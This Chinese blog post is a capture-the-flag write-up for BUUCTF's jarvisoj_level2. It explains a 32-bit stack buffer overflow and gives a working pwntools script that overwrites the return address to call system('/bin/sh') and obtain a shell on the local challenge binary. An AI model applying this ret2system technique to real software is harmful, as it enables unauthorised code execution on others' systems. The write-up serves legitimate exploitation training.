BUUCTF jarvisoj_level2 题解

已于 2023-08-20 22:10:08 修改
阅读量451 收藏 2
点赞数
文章标签: 网络安全 python
于 2023-08-20 20:27:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51802916/article/details/132395480
版权

BUUCTF jarvisoj_level2 题解

用checksec检查文件安全属性

c
  可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。

使用IDA反汇编程序

请添加图片描述
  从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出,IDA会告诉我们buf数组与ebp在栈上的相对位置,即&buf=$ebp-0x88,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且system()的地址可以轻松在plt表中找到,为0x08048320,因此我们只需要在构造一个shell路径的字符转就可以getshell了。
  首先在IDA中输入shift+F12,可以查找程序中的字符串。
请添加图片描述
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。接下来就可以构造payload了。

payload= b'a'*(0x88+4)+p32(0x08048320)+p32(return address)+p32(0x0804A024)

这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。

使用pwntools编写exp

from pwn import *
context.update(arch='i386',log_level='debug')
r=process('./level2')
payload= b'a'*(0x88+4)+p32(0x08048320)+p32(0x0804847F)+p32(0x0804A024)
r.sendlineafter(b'Input:',payload)
r.interactive()

请添加图片描述
本地执行脚本后,可以成功得到shell。

塵XI
关注
acm.rar_oj题目含题解_明代zjuoj
09-24
【标题】"acm.rar_oj题目含题解_明代zjuoj" 指的是一份关于ACM(国际大学生程序设计竞赛)的压缩包资源,特别关注在线判题系统(Online Judge,简称OJ)中的题目及其解题思路。这个资源主要面向大学阶段参与ACM竞赛...
jarvisoj_level2【BUUCTF
qq_41696518的博客
08-26 738
jarvisoj_level2【BUUCTF
jarvisoj-level2
qq_35661990的博客
11-09 1385
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
jarvisoj_level2_x64
最新发布
Nike_name的博客
07-13 248
溢出构造函数
jarvisoj_level2
m0_55086916的博客
11-29 669
第一个p32(0x08048320)是function函数的返回地址,第二个是system函数的返回地址,p32(0x0804a024)是system函数的第一个参数。注意到这里可以利用栈溢出漏洞,buf数组只给了0x88的大小,但是最多可以读入0x100个字节的数据,所以多读入的数据就会向下把栈给覆盖掉。于是想把function函数的返回地址覆盖成system函数的入口地址,然后把参数改成"bin/sh"字符串的地址。
jarvisoj level1-2
sun的博客
10-03 637
level1 先使用checksec查询一下这个保护机制没有开启任何保护 [*] '/home/sun/Desktop/1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x...
jarvis oj level2–两种方式构造函数栈
超人学飞的日子
04-07 617
关于这个level2,在网上找到了两种解法,放在一起分析了一下。 首先查看题目基本信息: 程序开启了栈不可执行保护。 IDA查看反汇编代码: 可以看到存在栈溢出,并且程序调用了system函数。 所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/b...
acm.rar_浙江大学 ACM 题解
09-24
2. **学习解题技巧**:浙江大学的题解可能包含高效解题策略,如如何快速理解题目、如何设计合适的算法模型等。 3. **提高编程速度**:通过实践,学习者可以提升编写高效代码的速度,这对于ACM竞赛至关重要。 4. **...
leetcode题解_leetcode_leetcode题解_
09-29
《LeetCode题解》是广大程序员提升算法能力和解决实际编程问题的重要资源库。它涵盖了大量来自LeetCode在线编程挑战平台的题目,旨在帮助开发者提升在算法、数据结构以及问题解决能力上的技能。LeetCode题解通常包括...
c++ source code_symbolqhw_flowpfp_蓝桥杯1251题解_
10-01
1251题解则意味着这是一个关于第1251题的解决方案,该题目可能涉及特定的编程问题或挑战,比如字符串处理、图论、动态规划等常见算法问题。 在“描述”中提到,这些源代码是部分题目的解答,可能包含了解决问题的...
icpc_solution:题解与模板
04-07
icpc_solution 题解与模板
洛谷_oj题库_洛谷oj网站_洛谷_洛谷题库下载_洛谷OJ_
09-29
洛谷(Luogu)是一个在线编程竞赛与学习平台,也被称为洛谷OJ(Online Judge),它提供了丰富的算法题目供用户练习和挑战。洛谷题库是这个平台的核心资源,包含了各种难度级别的编程题目,涵盖了数据结构、算法、...
历年题_CCF题解_
10-04
《历年CCF题解解析》 CCF,全称是中国计算机学会(China Computer Federation),它在计算机领域中扮演着重要角色,特别是在组织和推动计算机科学竞赛方面。每年,CCF都会举办一系列的竞赛,如NOI(全国青少年信息...
oj_solutions
03-17
oj_solutions】是一个关于在线编程挑战(Online Judge,简称OJ题解的压缩包,主要用于记录和整理用户在解决各种编程问题时所编写的代码。这个压缩包中的文件组织方式是按照难度等级来划分的,分别用不同的前缀...
acm.tar.gz_zoj_zoj题解_题目分类
09-21
《浙江大学ZOJ源码题解:题目类型与难易度分类》 浙江大学ZOJ(Zhejiang University Online Judge)是一个著名的在线编程竞赛平台,为广大学习计算机科学和技术的同学们提供了丰富的编程题目和实践机会。这个名为...
Leetcode 5个经典元素和问题题解_leetcode_leetcode题解_
10-01
本资源包含五个经典的LeetCode问题及其题解,这些题目涵盖了不同的算法类型,是学习和复习编程基础的宝贵资料。下面将详细阐述每个题目及其解题策略。 1. **2Sum (1)**: 这是LeetCode中的经典问题,标签为 "数组" ...
BUUCTF-[WUSTCTF2020]level2
qq_66455531的博客
06-16 236
PS:看了别人的攻略,他在windows不能正常使用脱壳器,要去linux上脱壳,但我的就运行完成了,linux的脱壳步骤在。得到flag{Just_upx_-d}提示检测到upx,那么我们就脱壳。然后发现答案就出现在眼前了。脱壳成功,在ida中打开。
[CTF]jarvisoj_level2
凉水的博客
01-12 513
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
bugkuctfweb题解simple_ssti_2
03-16
simple_ssti_2 是一道 Bugku CTF 网络安全比赛中的 Web 题目,它是一个简单的 SSTI(Server-Side Template Injection)漏洞题目。在这个题目中,我们需要通过注入一些恶意代码来获取 flag。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值